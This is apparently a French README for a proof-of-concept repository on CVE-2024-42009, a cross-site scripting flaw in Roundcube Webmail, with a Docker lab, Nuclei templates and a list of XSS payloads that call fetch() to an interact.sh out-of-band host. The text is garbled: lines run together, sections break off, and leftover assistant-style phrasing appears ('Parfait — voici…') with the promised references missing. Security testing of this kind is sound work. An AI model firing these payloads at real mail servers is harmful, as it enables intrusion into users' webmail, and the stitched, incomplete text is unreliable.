
Ce dépôt contient un modèle Nuclei et des ressources associées pour démontrer et valider en toute sécurité CVE-2024-42009, une vulnérabilité critique de XSS réfléchi dans Roundcube Webmail. Le défaut réside dans la fonction message_body() de show.php, où des modifications post-assainissement entraînent un désassainissement et un rendu non sécurisé de contenu d'e-mail HTML contrefait.
⚠️ Cette preuve de concept (PoC) est destinée uniquement à des tests éducatifs et autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas explicitement la permission de tester.
message_body() dans show.phpCe dépôt utilise la détection hors bande (OOB) via Interactsh pour confirmer l'exécution de JavaScript dans un laboratoire contrôlé.
<body> contenant onanimationstart et un beacon vers InteractshUtilisez le fichier Docker Compose fourni pour démarrer une instance Roundcube locale avec MailHog (réceptacle SMTP) et MariaDB.
git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
http://localhost:8080http://localhost:8025⚠️ N'utilisez pas votre compte Google.
CVE-2024-42009-OOB.yaml – Modèle Nuclei avec détection Interactsh et hors bande (OOB)CVE-2024-42009.yaml – Modèle Nuclei sans Interactsh ni OOBdocker-compose.yml – Configuration de l'environnement de laboratoire pour Roundcube WebmailImages/ – Captures d'écran montrant les requêtes HTTP/DNS provenant d'InteractshCette vidéo parcourt l'ensemble de la chaîne d'exploitation :
Pour inclure ces payloads XSS de manière responsable dans votre README, vous voudrez les placer dans une section clairement étiquetée à des fins éducatives ou de test. Voici une structure suggérée :
⚠️ Avertissement : Ces payloads sont destinés uniquement à un usage éducatif et à des tests de sécurité autorisés. Ne les déployez pas sur des systèmes sans autorisation explicite.
<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">
<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/HEAD/x" onerror="fetch('https://interact.sh/hit')">
<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>
<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>
<!-- JavaScript in iframe src -->
https://interact.sh/hit par votre propre endpoint d'écoute.Mettez à jour Roundcube vers :
Parfait — voici une section Références propre et professionnelle que vous pouvez inclure dans votre README ou votre soumission par e-mail pour CVE-2024-42009. Elle cite toutes les sources que vous avez listées, formatées pour plus de clarté et de crédibilité :